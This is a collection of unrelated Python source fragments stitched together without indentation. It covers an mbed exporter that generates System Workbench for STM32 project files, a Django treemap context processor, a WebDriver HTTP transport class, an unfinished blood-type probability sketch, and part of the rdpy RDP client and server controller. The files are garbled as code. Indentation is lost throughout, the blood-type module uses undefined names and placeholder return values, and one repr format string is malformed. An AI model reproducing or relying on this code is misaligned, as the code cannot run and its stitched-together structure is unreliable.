if '-s' in flags_in['ld_flags']:
opts['ld']['strip'] = True
opts['ld']['shared'] = False
if '-shared' in flags_in['ld_flags']:
opts['ld']['shared'] = True
opts['ld']['soname'] = ''
opts['ld']['implname'] = ''
opts['ld']['defname'] = ''
for item in flags_in['ld_flags']:
if item.startswith('-Wl,-soname='):
opts['ld']['soname'] = item[len('-Wl,-soname='):]
if item.startswith('-Wl,--out-implib='):
opts['ld']['implname'] = item[len('-Wl,--out-implib='):]
if item.startswith('-Wl,--output-def='):
opts['ld']['defname'] = item[len('-Wl,--output-def='):]
opts['common']['arm.target.fpu.hardware'] = self.get_fpu_hardware(
opts['common']['arm.target.fpu.unit'])
opts['common']['debugging.codecov'] = False
if '-fprofile-arcs' in flags_in['common_flags'] and '-ftest-coverage' in flags_in['common_flags']:
opts['common']['debugging.codecov'] = True
# Passing linker options to linker with '-Wl,'-prefix.
for index in range(len(opts['ld']['flags'])):
item = opts['ld']['flags'][index]
if not item.startswith('-Wl,'):
opts['ld']['flags'][index] = '-Wl,' + item
# Strange System Workbench feature: If first parameter in Other flags is a
# define (-D...), Other flags will be replaced by defines and other flags
# are completely ignored. Moving -D parameters to defines.
for compiler in ['c', 'cpp', 'as']:
tmpList = opts[compiler]['other'].split(' ')
otherList = []
for item in tmpList:
if item.startswith('-D'):
opts[compiler]['defines'].append(str(item[2:]))
else:
otherList.append(item)
opts[compiler]['other'] = ' '.join(otherList)
# Assembler options
for as_def in opts['as']['defines']:
if '=' in as_def:
opts['as']['other'] += ' --defsym ' + as_def
else:
opts['as']['other'] += ' --defsym ' + as_def + '=1'
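        # Example: as_defines of ['DEBUG', 'F_CPU=16000000'] appends
        # ' --defsym DEBUG=1 --defsym F_CPU=16000000' to opts['as']['other'].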
def generate(self):
"""
Generate the .project and .cproject files.
"""
options = {}
if not self.resources.linker_script:
raise NotSupportedException("No linker script found.")
print('\nCreate a System Workbench for STM32 managed project')
print('Project name: {0}'.format(self.project_name))
print('Target: {0}'.format(self.toolchain.target.name))
print('Toolchain: {0}'.format(self.TOOLCHAIN) + '\n')
self.resources.win_to_unix()
libraries = []
for lib in self.libraries:
library, _ = splitext(basename(lib))
libraries.append(library[3:])
self.system_libraries = [
'stdc++', 'supc++', 'm', 'c', 'gcc', 'nosys'
]
profiles = self.get_all_profiles()
        self.as_defines = [s.replace('"', '&quot;')
                           for s in self.toolchain.get_symbols(True)]
        self.c_defines = [s.replace('"', '&quot;')
                          for s in self.toolchain.get_symbols()]
self.cpp_defines = self.c_defines
self.include_path = []
for s in self.resources.inc_dirs:
self.include_path.append("../" + self.filter_dot(s))
print('Include folders: {0}'.format(len(self.include_path)))
self.compute_exclusions()
print('Exclude folders: {0}'.format(len(self.excluded_folders)))
ld_script = self.filter_dot(self.resources.linker_script)
print('Linker script: {0}'.format(ld_script))
lib_dirs = [self.filter_dot(s) for s in self.resources.lib_dirs]
preproc_cmd = basename(self.toolchain.preproc[0]) + " " + " ".join(self.toolchain.preproc[1:])
for id in ['debug', 'release']:
opts = {}
opts['common'] = {}
opts['as'] = {}
opts['c'] = {}
opts['cpp'] = {}
opts['ld'] = {}
opts['id'] = id
opts['name'] = opts['id'].capitalize()
profile = profiles[id]
# A small hack, do not bother with src_path again,
# pass an empty string to avoid crashing.
src_paths = ['']
toolchain = prepare_toolchain(
src_paths, "", self.toolchain.target.name, self.TOOLCHAIN, build_profile=[profile])
# Hack to fill in build_dir
toolchain.build_dir = self.toolchain.build_dir
flags = self.toolchain_flags(toolchain)
# Most GNU ARM Eclipse options have a parent,
# either debug or release.
if '-O0' in flags['common_flags'] or '-Og' in flags['common_flags']:
opts['parent_id'] = 'debug'
else:
opts['parent_id'] = 'release'
self.process_options(opts, flags)
opts['c']['defines'] = self.c_defines
opts['cpp']['defines'] = self.cpp_defines
opts['as']['defines'] = self.as_defines
self.process_sw_options(opts, flags)
opts['ld']['library_paths'] = [
self.filter_dot(s) for s in self.resources.lib_dirs]
opts['ld']['user_libraries'] = libraries
opts['ld']['system_libraries'] = self.system_libraries
opts['ld']['script'] = "linker-script-" + id + ".ld"
# Unique IDs used in multiple places.
uid = {}
uid['config'] = u.id
uid['tool_c_compiler'] = u.id
uid['tool_c_compiler_input'] = u.id
uid['tool_cpp_compiler'] = u.id
uid['tool_cpp_compiler_input'] = u.id
opts['uid'] = uid
options[id] = opts
ctx = {
'name': self.project_name,
'platform': platform,
'include_paths': self.include_path,
'config_header': self.config_header_ref.name,
'exclude_paths': '|'.join(self.excluded_folders),
'ld_script': ld_script,
'library_paths': lib_dirs,
'object_files': self.resources.objects,
'libraries': libraries,
'board_name': self.BOARDS[self.target.upper()]['name'],
'mcu_name': self.BOARDS[self.target.upper()]['mcuId'],
'cpp_cmd': preproc_cmd,
'options': options,
            # The id property of 'u' generates a new random identifier
            # every time it is accessed.
'u': u
}
self.__gen_dir('.settings')
self.gen_file('sw4stm32/language_settings_commom.tmpl',
ctx, '.settings/language.settings.xml')
self.gen_file('sw4stm32/project_common.tmpl', ctx, '.project')
self.gen_file('sw4stm32/cproject_common.tmpl', ctx, '.cproject')
self.gen_file('sw4stm32/makefile.targets.tmpl', ctx,
'makefile.targets', trim_blocks=True, lstrip_blocks=True)
self.gen_file('sw4stm32/launch.tmpl', ctx, self.project_name +
' ' + options['debug']['name'] + '.launch')
@staticmethod
def clean(_):
shutil.rmtree(".settings")
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import copy
from django.conf import settings
from django.contrib.staticfiles import finders
from django.utils.timezone import now
from django.utils.translation import ugettext as _
from treemap.util import get_last_visited_instance
from treemap.models import InstanceUser
REPLACEABLE_TERMS = {
'Resource': {'singular': _('Resource'),
'plural': _('Resources')}
}
def global_settings(request):
last_instance = get_last_visited_instance(request)
if hasattr(request, 'user') and request.user.is_authenticated():
last_effective_instance_user =\
request.user.get_effective_instance_user(last_instance)
_update_last_seen(last_effective_instance_user)
else:
if hasattr(request, 'instance'):
instance = request.instance
default_role = instance.default_role
last_effective_instance_user = InstanceUser(
role=default_role, instance=instance)
else:
last_effective_instance_user = None
if hasattr(request, 'instance') and request.instance.logo:
logo_url = request.instance.logo.url
else:
logo_url = settings.STATIC_URL + "img/logo.png"
try:
comment_file_path = finders.find('version.txt')
with open(comment_file_path, 'r') as f:
header_comment = f.read()
    except Exception:
header_comment = "Version information not available\n"
term = copy.copy(REPLACEABLE_TERMS)
if hasattr(request, 'instance'):
term.update(request.instance.config.get('terms', {}))
ctx = {
'SITE_ROOT': settings.SITE_ROOT,
'settings': settings,
'last_instance': last_instance,
'last_effective_instance_user': last_effective_instance_user,
'logo_url': logo_url,
'header_comment': header_comment,
'term': term,
}
return ctx
def _update_last_seen(last_effective_instance_user):
# Update the instance user's "last seen" date if necessary.
# Done here instead of in middleware to avoid looking up
# the request's InstanceUser again.
iu = last_effective_instance_user
today = now().date()
if iu and iu.id and (not iu.last_seen or iu.last_seen < today):
iu.last_seen = today
iu.save_base()
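# Activation sketch (hedged: the dotted path below assumes this module lives at
# treemap.context_processors; adjust it to the project's actual layout):
#
#   TEMPLATES[0]['OPTIONS']['context_processors'].append(
#       'treemap.context_processors.global_settings')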
import json
import select
from six import text_type, PY3
from six.moves.http_client import HTTPConnection
from six.moves.urllib import parse as urlparse
from . import error
"""Implements HTTP transport for the WebDriver wire protocol."""
class Response(object):
"""
Describes an HTTP response received from a remote end whose
body has been read and parsed as appropriate.
"""
def __init__(self, status, body, headers):
self.status = status
self.body = body
self.headers = headers
def __repr__(self):
cls_name = self.__class__.__name__
if self.error:
return "<%s status=%s error=%s>" % (cls_name, self.status, repr(self.error))
return "<% status=%s body=%s>" % (cls_name, self.status, json.dumps(self.body))
def __str__(self):
return json.dumps(self.body, indent=2)
@property
def error(self):
if self.status != 200:
return error.from_response(self)
return None
@classmethod
def from_http(cls, http_response, decoder=json.JSONDecoder, **kwargs):
try:
body = json.load(http_response, cls=decoder, **kwargs)
headers = dict(http_response.getheaders())
except ValueError:
raise ValueError("Failed to decode response body as JSON:\n" +
http_response.read())
return cls(http_response.status, body, headers)
class HTTPWireProtocol(object):
"""
Transports messages (commands and responses) over the WebDriver
wire protocol.
Complex objects, such as ``webdriver.Element``, ``webdriver.Frame``,
and ``webdriver.Window`` are by default not marshaled to enable
use of `session.transport.send` in WPT tests::
session = webdriver.Session("127.0.0.1", 4444)
        response = session.transport.send("GET", "element/active", None)
        print(response.body["value"])
# => {u'element-6066-11e4-a52e-4f735466cecf': u'<uuid>'}
Automatic marshaling is provided by ``webdriver.protocol.Encoder``
and ``webdriver.protocol.Decoder``, which can be passed in to
``HTTPWireProtocol.send`` along with a reference to the current
``webdriver.Session``::
session = webdriver.Session("127.0.0.1", 4444)
        response = session.transport.send("GET", "element/active", None,
            encoder=protocol.Encoder, decoder=protocol.Decoder,
            session=session)
        print(response.body["value"])
# => webdriver.Element
"""
def __init__(self, host, port, url_prefix="/"):
"""
Construct interface for communicating with the remote server.
        :param host: Hostname or IP address of the remote WebDriver server.
        :param port: Port of the remote WebDriver server.
        :param url_prefix: Path prefix prepended to every command endpoint.
"""
self.host = host
self.port = port
self.url_prefix = url_prefix
self._conn = None
self._last_request_is_blocked = False
def __del__(self):
self.close()
def close(self):
"""Closes the current HTTP connection, if there is one."""
if self._conn:
self._conn.close()
@property
def connection(self):
"""Gets the current HTTP connection, or lazily creates one."""
if not self._conn:
conn_kwargs = {}
if not PY3:
conn_kwargs["strict"] = True
            # We do not set an HTTP timeout other than the default when the
            # connection is created. The send method applies a timeout if needed.
self._conn = HTTPConnection(self.host, self.port, **conn_kwargs)
return self._conn
def url(self, suffix):
"""
From the relative path to a command end-point,
craft a full URL suitable to be used in a request to the HTTPD.
"""
return urlparse.urljoin(self.url_prefix, suffix)
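    # Example (urljoin semantics, so the trailing slash on the prefix matters):
    # with url_prefix "/wd/hub/", url("session/123/url") -> "/wd/hub/session/123/url";
    # with the default prefix "/", url("session/123/url") -> "/session/123/url".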
def send(self,
method,
uri,
body=None,
headers=None,
encoder=json.JSONEncoder,
decoder=json.JSONDecoder,
timeout=None,
**codec_kwargs):
"""
Send a command to the remote.
The request `body` must be JSON serialisable unless a
custom `encoder` has been provided. This means complex
objects such as ``webdriver.Element``, ``webdriver.Frame``,
        and ``webdriver.Window`` are not automatically made
into JSON. This behaviour is, however, provided by
``webdriver.protocol.Encoder``, should you want it.
        Similarly, the response body is returned au naturel
as plain JSON unless a `decoder` that converts web
element references to ``webdriver.Element`` is provided.
Use ``webdriver.protocol.Decoder`` to achieve this behaviour.
The client will attempt to use persistent HTTP connections.
:param method: `GET`, `POST`, or `DELETE`.
:param uri: Relative endpoint of the requests URL path.
:param body: Body of the request. Defaults to an empty
dictionary if ``method`` is `POST`.
:param headers: Additional dictionary of headers to include
in the request.
:param encoder: JSON encoder class, which defaults to
``json.JSONEncoder`` unless specified.
:param decoder: JSON decoder class, which defaults to
``json.JSONDecoder`` unless specified.
:param codec_kwargs: Surplus arguments passed on to `encoder`
and `decoder` on construction.
:return: Instance of ``webdriver.transport.Response``
describing the HTTP response received from the remote end.
:raises ValueError: If `body` or the response body are not
JSON serialisable.
"""
if body is None and method == "POST":
body = {}
payload = None
if body is not None:
try:
payload = json.dumps(body, cls=encoder, **codec_kwargs)
except ValueError:
raise ValueError("Failed to encode request body as JSON:\n"
"%s" % json.dumps(body, indent=2))
        # When the timeout triggers, the TestRunnerManager thread will reuse
        # this connection to check if the WebDriver is alive, and we may end up
        # raising an httplib.CannotSendRequest exception if the WebDriver is
        # not responding and this httplib.request() call is blocked on the
        # runner thread. We use the boolean below to check for that and restart
        # the connection in that case.
self._last_request_is_blocked = True
        response = self._request(method, uri, payload, headers, timeout=timeout)
self._last_request_is_blocked = False
return Response.from_http(response, decoder=decoder, **codec_kwargs)
def _request(self, method, uri, payload, headers=None, timeout=None):
if isinstance(payload, text_type):
payload = payload.encode("utf-8")
if headers is None:
headers = {}
headers.update({"Connection": "keep-alive"})
url = self.url(uri)
if self._last_request_is_blocked or self._has_unread_data():
self.close()
self.connection.request(method, url, payload, headers)
# timeout for request has to be set just before calling httplib.getresponse()
# and the previous value restored just after that, even on exception raised
try:
if timeout:
previous_timeout = self._conn.gettimeout()
self._conn.settimeout(timeout)
response = self.connection.getresponse()
finally:
if timeout:
self._conn.settimeout(previous_timeout)
return response
def _has_unread_data(self):
return self._conn and self._conn.sock and select.select([self._conn.sock], [], [], 0)[0]
#!/usr/bin/env python
"""
Phenotype: 0, A, B, AB
Genotype: 00, 0A, A0, AA, 0B, B0, BB, AB
P(P):
0 .37
A .38
B .17
AB .08
P(P|G)
0 | 00 1
A | 0A 1
A | A0 1
A | AA 1
B | 0B 1
B | B0 1
B | BB 1
AB | AB 1
otherwise 0
"""
from prob import P
from enum import Enum
class Phenotype(Enum):
O = 0
A = 1
B = 2
AB = 3
def genPhenotypeSet(name):
return Enum("Phenotype_"+name,"0 A B AB", module=__name__)
def genPhenotypeGivenGenotypeProb(name,genotype):
pset = genPhenotypeSet(name)
return "p_NAME(TOP_Parent)_Phenotype_Genotype"
def genGenotypeGivenParentsGenotype(name,mother,father):
return "p_"
class Genotype(Enum):
OO = 1
OA = 2
AO = 3
AA = 4
OB = 5
BO = 6
BB = 7
AB = 8
BA = 9
def genGenotypeSet(name):
return Enum("Genotype_"+name, "OO OA AO AA OB BO BB AB BA", module=__name__)
"""
# wikipedia - eu
p_Phenotype = P(Phenotype)
p_Phenotype.table([ [Phenotype.O, 0.37],
[Phenotype.A, 0.38],
[Phenotype.B, 0.17],
[Phenotype.AB,0.08]])
# http://anthro.palomar.edu/blood/table_of_ABO_and_Rh_blood_type_frequencies_in_US.htmw
p_Phenotype = P(Phenotype)
p_Phenotype.table([ [Phenotype.O, 0.44],
[Phenotype.A, 0.44],
[Phenotype.B, 0.10],
[Phenotype.AB,0.04]])
p_Genotype = P(Genotype)
p_Genotype.table([ [Genotype.OO, 1.0],
[Genotype.OA, 1.0],
[Genotype.AO, 1.0],
[Genotype.AA, 1.0],
[Genotype.OB, 1.0],
[Genotype.BO, 1.0],
[Genotype.BB, 1.0],
[Genotype.AB, 1.0],
                    [Genotype.BA, 1.0]])
p_Genotype.normalize()
# https://en.wikipedia.org/wiki/Blood_type_distribution_by_country
# http://www.sciencedirect.com/science/article/pii/S1110863011000796
# https://www.hindawi.com/journals/bmri/2014/286810/
p_Phenotype_Genotype = P(Phenotype).given(Genotype)
p_Phenotype_Genotype.table([ [Phenotype.O, Genotype.OO, 1.0],
[Phenotype.A, Genotype.OA, 1.0],
[Phenotype.A, Genotype.AO, 1.0],
[Phenotype.A, Genotype.AA, 1.0],
[Phenotype.B, Genotype.OB, 1.0],
[Phenotype.B, Genotype.BO, 1.0],
[Phenotype.B, Genotype.BB, 1.0],
[Phenotype.AB, Genotype.AB, 1.0],
[Phenotype.AB, Genotype.BA, 1.0]])
p_Genotype_Phenotype = P(Genotype).given(Phenotype)
p_Genotype_Phenotype.table([ [Genotype.OO, Phenotype.O, 1.0],
[Genotype.OA, Phenotype.A, 0.33],
[Genotype.AO, Phenotype.A, 0.33],
[Genotype.AA, Phenotype.A, 0.34],
[Genotype.OB, Phenotype.B, 0.33],
[Genotype.BO, Phenotype.B, 0.33],
[Genotype.BB, Phenotype.B, 0.34],
[Genotype.AB, Phenotype.AB, 1.0],
[Genotype.BA, Phenotype.AB, 1.0]])
p_PhenotypeGenotype = p_Genotype_Phenotype * p_Phenotype
p_Genotype_ParentLeft = P(Genotype).given(Genotype)
p_Genotype_ParentLeft.table([ [Genotype.OO, L_Genotype.OO, 1.],
[Genotype.OO, L_Genotype.OA, 1.],
[Genotype.OO, L_Genotype.OB, 1.],
[Genotype.AO, L_Genotype.AO, 1.],
[Genotype.AO, L_Genotype.AA, 1.],
[Genotype.AO, L_Genotype.AB, 1.],
[Genotype.AB, L_Genotype.AO, 1.],
[Genotype.AB, L_Genotype.AA, 1.],
[Genotype.AB, L_Genotype.AB, 1.],
[Genotype.BO, L_Genotype.BO, 1.],
[Genotype.BO, L_Genotype.BB, 1.],
[Genotype.BO, L_Genotype.BA, 1.],
[Genotype.BA, L_Genotype.BO, 1.],
[Genotype.BA, L_Genotype.BB, 1.],
[Genotype.BA, L_Genotype.BA, 1.]])
p_Genotype_ParentRight = P(Genotype).given(Genotype)
p_Genotype_ParentRight.table([ [Genotype.OO, R_Genotype.OO, 1.],
[Genotype.OO, R_Genotype.AO, 1.],
[Genotype.OO, R_Genotype.BO, 1.],
[Genotype.OA, R_Genotype.OA, 1.],
[Genotype.OA, R_Genotype.AA, 1.],
[Genotype.OA, R_Genotype.BA, 1.],
[Genotype.BA, R_Genotype.OA, 1.],
[Genotype.BA, R_Genotype.AA, 1.],
[Genotype.BA, R_Genotype.BA, 1.],
[Genotype.OB, R_Genotype.OB, 1.],
[Genotype.OB, R_Genotype.BB, 1.],
[Genotype.OB, R_Genotype.AB, 1.],
[Genotype.AB, R_Genotype.OB, 1.],
[Genotype.AB, R_Genotype.BB, 1.],
[Genotype.AB, R_Genotype.AB, 1.]])
p_Genotype_Parent = P(Genotype).given(L_Genotype,R_Genotype)
p_Genotype_Parent.table([
            [Genotype.OO, L_Genotype.OO, R_Genotype.OO, 1],
            [Genotype.OO, L_Genotype.AO, R_Genotype.OO, 1],
            [Genotype.OO, L_Genotype.OO, R_Genotype.OO, 1],
            [Genotype.OO, L_Genotype.OO, R_Genotype.OO, 1],
            [Genotype.OO, L_Genotype.OO, R_Genotype.OO, 1],
            [Genotype.OO, L_Genotype.OO, R_Genotype.OO, 1]])
# p_Genotype_Phenotype = p_PhenotypeGenotype / p_Phenotype
"""
"""
P(P,G) = P(P|G)*P(G)
P(P,G) = P(G|P)*P(P)
P(G|P) = P(P|G)*P(G)/P(P)
P(P|Pp): sum( P|PmPd, Pd)
Grand Mom Pheno Uknown Parent Pheno
| | |
+--------+ | +------------------+
v | |
Grand Mom Blood | |
v v
Mom Pheno Dad Pheno Step Mom Pheno
| | | | | | |
| | | | +-------------+ | |
| | | | | | +-------+
+-+ +------+ +------+--+ +-+ +---+ | v
v | | | v | | Step Mom Blood
Mom Blood | | | Dad Blood v v
| | | Step Sister Pheno
v v +-----------+ |
Child Pheno v v
| Sibiling Pheno Step Sister Blood
v |
Child Blood v
Sibiling Blood
"""
"""
Possible Node instances:
blood : value
0 : .37
A : .38
B : .17
AB : .08
child_blood, parent_blood : value
A A : .3
0 A : .2
0 AB : 0
child_blood, parent_blood | grand_blood : value
A A | A : .3
0 A | 0 : .2
0 AB | 0 : 0
"""
#
# Copyright (c) 2014-2015 Sylvain Peyrefitte
#
# This file is part of rdpy.
#
# rdpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Use to manage RDP stack in twisted
"""
from rdpy.core import layer
from rdpy.core.error import CallPureVirtualFuntion, InvalidValue
import pdu.layer
import pdu.data
import pdu.caps
import rdpy.core.log as log
import tpkt, x224, sec
from t125 import mcs, gcc
from nla import cssp, ntlm
class SecurityLevel(object):
"""
@summary: RDP security level
"""
RDP_LEVEL_RDP = 0
RDP_LEVEL_SSL = 1
RDP_LEVEL_NLA = 2
class RDPClientController(pdu.layer.PDUClientListener):
"""
Manage RDP stack as client
"""
def __init__(self):
#list of observer
self._clientObserver = []
#PDU layer
self._pduLayer = pdu.layer.Client(self)
#secure layer
self._secLayer = sec.Client(self._pduLayer)
#multi channel service
self._mcsLayer = mcs.Client(self._secLayer)
#transport pdu layer
self._x224Layer = x224.Client(self._mcsLayer)
#transport packet (protocol layer)
self._tpktLayer = tpkt.TPKT(self._x224Layer)
#fastpath stack
self._pduLayer.initFastPath(self._secLayer)
self._secLayer.initFastPath(self._tpktLayer)
#is pdu layer is ready to send
self._isReady = False
def getProtocol(self):
"""
@return: return Protocol layer for twisted
In case of RDP TPKT is the Raw layer
"""
return cssp.CSSP(self._tpktLayer, ntlm.NTLMv2(self._secLayer._info.domain.value, self._secLayer._info.userName.value, self._secLayer._info.password.value))
def getColorDepth(self):
"""
@return: color depth set by the server (15, 16, 24)
"""
return self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_BITMAP].capability.preferredBitsPerPixel.value
def getKeyEventUniCodeSupport(self):
"""
@return: True if server support unicode input
"""
return self._pduLayer._serverCapabilities[pdu.caps.CapsType.CAPSTYPE_INPUT].capability.inputFlags.value & pdu.caps.InputFlags.INPUT_FLAG_UNICODE
def setPerformanceSession(self):
"""
@summary: Set particular flag in RDP stack to avoid wall-paper, theme, menu animation etc...
"""
self._secLayer._info.extendedInfo.performanceFlags.value = sec.PerfFlag.PERF_DISABLE_WALLPAPER | sec.PerfFlag.PERF_DISABLE_MENUANIMATIONS | sec.PerfFlag.PERF_DISABLE_CURSOR_SHADOW | sec.PerfFlag.PERF_DISABLE_THEMING | sec.PerfFlag.PERF_DISABLE_FULLWINDOWDRAG
def setScreen(self, width, height):
"""
@summary: Set screen dim of session
@param width: width in pixel of screen
@param height: height in pixel of screen
"""
#set screen definition in MCS layer
self._mcsLayer._clientSettings.getBlock(gcc.MessageType.CS_CORE).desktopHeight.value = height
self._mcsLayer._clientSettings.getBlock(gcc.MessageType.CS_CORE).desktopWidth.value = width
def setUsername(self, username):
"""
@summary: Set the username for session
@param username: {string} username of session
"""
#username in PDU info packet
self._secLayer._info.userName.value = username
self._secLayer._licenceManager._username = username
def setPassword(self, password):
"""
@summary: Set password for session
@param password: {string} password of session
"""
self.setAutologon()
self._secLayer._info.password.value = password
def setDomain(self, domain):
"""
@summary: Set the windows domain of session
@param domain: {string} domain of session
"""
self._secLayer._info.domain.value = domain
def setAutologon(self):
"""
@summary: enable autologon
"""
self._secLayer._info.flag |= sec.InfoFlag.INFO_AUTOLOGON
def setAlternateShell(self, appName):
"""
        @summary: set application name of app which starts at the beginning of session
@param appName: {string} application name
"""
self._secLayer._info.alternateShell.value = appName
def setKeyboardLayout(self, layout):
"""
@summary: keyboard layout
@param layout: us | fr
"""
if layout == "fr":
self._mcsLayer._clientSettings.CS_CORE.kbdLayout.value = gcc.KeyboardLayout.FRENCH
elif layout == "us":
self._mcsLayer._clientSettings.CS_CORE.kbdLayout.value = gcc.KeyboardLayout.US
def setHostname(self, hostname):
"""
@summary: set hostname of machine
"""
self._mcsLayer._clientSettings.CS_CORE.clientName.value = hostname[:15] + "\x00" * (15 - len(hostname))
self._secLayer._licenceManager._hostname = hostname
def setSecurityLevel(self, level):
"""
@summary: Request basic security
@param level: {SecurityLevel}
"""
if level == SecurityLevel.RDP_LEVEL_RDP:
self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_RDP
elif level == SecurityLevel.RDP_LEVEL_SSL:
self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_SSL
elif level == SecurityLevel.RDP_LEVEL_NLA:
self._x224Layer._requestedProtocol = x224.Protocols.PROTOCOL_SSL | x224.Protocols.PROTOCOL_HYBRID
def addClientObserver(self, observer):
"""
@summary: Add observer to RDP protocol
@param observer: new observer to add
"""
self._clientObserver.append(observer)
def removeClientObserver(self, observer):
"""
@summary: Remove observer to RDP protocol stack
@param observer: observer to remove
"""
for i in range(0, len(self._clientObserver)):
if self._clientObserver[i] == observer:
del self._clientObserver[i]
return
def onUpdate(self, rectangles):
"""
@summary: Call when a bitmap data is received from update PDU
@param rectangles: [pdu.BitmapData] struct
"""
for observer in self._clientObserver:
#for each rectangle in update PDU
for rectangle in rectangles:
observer.onUpdate(rectangle.destLeft.value, rectangle.destTop.value, rectangle.destRight.value, rectangle.destBottom.value, rectangle.width.value, rectangle.height.value, rectangle.bitsPerPixel.value, rectangle.flags.value & pdu.data.BitmapFlag.BITMAP_COMPRESSION, rectangle.bitmapDataStream.value)
def onReady(self):
"""
@summary: Call when PDU layer is connected
"""
self._isReady = True
#signal all listener
for observer in self._clientObserver:
observer.onReady()
def onSessionReady(self):
"""
@summary: Call when Windows session is ready (connected)
"""
self._isReady = True
#signal all listener
for observer in self._clientObserver:
observer.onSessionReady()
def onClose(self):
"""
@summary: Event call when RDP stack is closed
"""
self._isReady = False
for observer in self._clientObserver:
observer.onClose()
def sendPointerEvent(self, x, y, button, isPressed):
"""
@summary: send pointer events
@param x: x position of pointer
@param y: y position of pointer
@param button: 1 or 2 or 3
@param isPressed: true if button is pressed or false if it's released
"""
if not self._isReady:
return
try:
if button == 4 or button == 5:
event = pdu.data.PointerExEvent()
if isPressed:
event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_DOWN
if button == 4:
event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_BUTTON1
elif button == 5:
event.pointerFlags.value |= pdu.data.PointerExFlag.PTRXFLAGS_BUTTON2
else:
event = pdu.data.PointerEvent()
if isPressed:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_DOWN
if button == 1:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON1
elif button == 2:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON2
elif button == 3:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_BUTTON3
else:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_MOVE
# position
event.xPos.value = x
event.yPos.value = y
# send proper event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send pointer event with incorrect position")
def sendWheelEvent(self, x, y, step, isNegative = False, isHorizontal = False):
"""
@summary: Send a mouse wheel event
@param x: x position of pointer
@param y: y position of pointer
@param step: number of step rolled
@param isHorizontal: horizontal wheel (default is vertical)
@param isNegative: is upper (default down)
"""
if not self._isReady:
return
try:
event = pdu.data.PointerEvent()
if isHorizontal:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_HWHEEL
else:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_WHEEL
if isNegative:
event.pointerFlags.value |= pdu.data.PointerFlag.PTRFLAGS_WHEEL_NEGATIVE
event.pointerFlags.value |= (step & pdu.data.PointerFlag.WheelRotationMask)
#position
event.xPos.value = x
event.yPos.value = y
#send proper event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send wheel event with incorrect position")
def sendKeyEventScancode(self, code, isPressed, extended = False):
"""
@summary: Send a scan code to RDP stack
@param code: scan code
@param isPressed: True if key is pressed and false if it's released
@param extended: {boolean} extended scancode like ctr or win button
"""
if not self._isReady:
return
try:
event = pdu.data.ScancodeKeyEvent()
event.keyCode.value = code
if not isPressed:
event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_RELEASE
if extended:
event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_EXTENDED
#send event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send bad key event")
def sendKeyEventUnicode(self, code, isPressed):
"""
@summary: Send a scan code to RDP stack
@param code: unicode
@param isPressed: True if key is pressed and false if it's released
"""
if not self._isReady:
return
try:
event = pdu.data.UnicodeKeyEvent()
event.unicode.value = code
if not isPressed:
event.keyboardFlags.value |= pdu.data.KeyboardFlag.KBDFLAGS_RELEASE
#send event
self._pduLayer.sendInputEvents([event])
except InvalidValue:
log.info("try send bad key event")
def sendRefreshOrder(self, left, top, right, bottom):
"""
@summary: Force server to resend a particular zone
@param left: left coordinate
@param top: top coordinate
@param right: right coordinate
@param bottom: bottom coordinate
"""
refreshPDU = pdu.data.RefreshRectPDU()
rect = pdu.data.InclusiveRectangle()
rect.left.value = left
rect.top.value = top
rect.right.value = right
rect.bottom.value = bottom
refreshPDU.areasToRefresh._array.append(rect)
self._pduLayer.sendDataPDU(refreshPDU)
def close(self):
"""
@summary: Close protocol stack
"""
self._pduLayer.close()
class RDPServerController(pdu.layer.PDUServerListener):
"""
@summary: Controller use in server side mode
"""
def __init__(self, colorDepth, privateKeyFileName = None, certificateFileName = None):
"""
@param privateKeyFileName: file contain server private key
@param certficiateFileName: file that contain public key
@param colorDepth: 15, 16, 24
"""
self._isReady = False
#list of observer
self._serverObserver = []
#build RDP protocol stack
self._pduLayer = pdu.layer.Server(self)
#secure layer
self._secLayer = sec.Server(self._pduLayer)
#multi channel service
self._mcsLayer = mcs.Server(self._secLayer)
#transport pdu layer
self._x224Layer = x224.Server(self._mcsLayer, privateKeyFileName, certificateFileName, False)
#transport packet (protocol layer)
self._tpktLayer = tpkt.TPKT(self._x224Layer)
#fastpath stack
self._pduLayer.initFastPath(self._secLayer)
self._secLayer.initFastPath(self._tpktLayer)
#set color depth of session
self.setColorDepth(colorDepth)
def close(self):
"""
@summary: Close protocol stack
"""
self._pduLayer.close()
def getProtocol(self):
"""
@return: the twisted protocol layer
in RDP case is TPKT layer
"""
return self._tpktLayer
def getHostname(self):
"""
@return: name of client (information done by RDP)
"""
return self._mcsLayer._clientSettings.CS_CORE.clientName.value.strip('\x00')
def getUsername(self):
"""
        @summary: Must be called after the onReady event, otherwise always an empty string
        @return: username sent by client, may be an empty string
"""
return self._secLayer._info.userName.value
def getPassword(self):
"""
        @summary: Must be called after the onReady event, otherwise always an empty string
        @return: password sent by client, may be an empty string
"""
return self._secLayer._info.password.value
def getDomain(self):
"""
        @summary: Must be called after the onReady event, otherwise always an empty string
        @return: domain sent by client, may be an empty string
"""
return self._secLayer._info.domain.value
def getCredentials(self):
"""
        @summary: Must be called after the onReady event, otherwise always empty strings
@return: tuple(domain, username, password)
"""
